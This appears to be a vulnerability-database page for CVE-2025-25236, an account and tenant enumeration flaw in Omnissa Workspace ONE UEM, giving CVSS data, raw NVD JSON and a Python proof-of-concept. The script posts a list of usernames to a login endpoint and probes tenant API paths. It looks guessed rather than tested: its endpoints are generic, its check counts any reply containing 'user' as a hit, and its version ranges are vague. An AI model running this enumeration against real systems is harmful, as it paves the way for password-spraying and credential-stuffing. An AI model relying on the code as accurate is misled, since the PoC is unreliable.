Security Vulnerability Report
中文
CVE-2025-25236 CVSS 5.3 MEDIUM

CVE-2025-25236

Published: 2025-11-12 18:15:35
Last Modified: 2026-04-15 00:35:42
Source: de5a6978-88fe-4c27-a7df-d0d5b52d5b52

Description

Omnissa Workspace ONE UEM contains an observable response discrepancy vulnerability. A malicious actor may be able to enumerate sensitive information such as tenant ID and user accounts that could facilitate brute-force, password-spraying or credential-stuffing attacks.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Omnissa Workspace ONE UEM < 25.x (具体版本需参考官方补丁说明)
Omnissa Workspace ONE UEM < 24.x (旧版本可能受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-25236 PoC - Workspace ONE UEM User Enumeration # This PoC demonstrates the observable response discrepancy vulnerability import requests import time import re TARGET_URL = "https://[Workspace ONE UEM Host]/api/v1/auth/login" def test_user_enumeration(username_list): """Test for user enumeration vulnerability by observing response differences""" results = [] for username in username_list: payload = { "username": username, "password": "fake_password_for_testing" } # Measure response time start_time = time.time() response = requests.post(TARGET_URL, json=payload, timeout=10) end_time = time.time() response_time = end_time - start_time result = { "username": username, "status_code": response.status_code, "response_time": response_time, "response_body": response.text[:200], "has_user": False } # Analyze response for differences that indicate valid user # Valid users may have different error messages, response times, or headers if "tenant" in response.text.lower() or "user" in response.text.lower(): result["has_user"] = True results.append(result) return results def check_tenant_enumeration(): """Check for tenant ID enumeration via API endpoints""" tenant_endpoints = [ "/api/v1/tenant/info", "/api/v1/system/configuration", "/api/v1/users/current" ] for endpoint in tenant_endpoints: try: response = requests.get(TARGET_URL.rsplit('/', 1)[0] + endpoint) if response.status_code == 200 and "tenant" in response.text.lower(): print(f"[+] Tenant info exposed at {endpoint}") except: pass # Example usage if __name__ == "__main__": test_users = ["admin", "user", "test", "administrator", "guest"] results = test_user_enumeration(test_users) for r in results: print(f"User: {r['username']}, Time: {r['response_time']:.3f}s, Status: {r['status_code']}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-25236", "sourceIdentifier": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52", "published": "2025-11-12T18:15:35.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Omnissa Workspace ONE UEM contains an observable response discrepancy vulnerability. A malicious actor may be able to enumerate sensitive information such as tenant ID and user accounts that could facilitate brute-force, password-spraying or credential-stuffing attacks."}], "metrics": {"cvssMetricV31": [{"source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://static.omnissa.com/sites/default/files/OMSA-2025-0005.pdf", "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52"}, {"url": "https://www.omnissa.com/omnissa-security-response/", "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.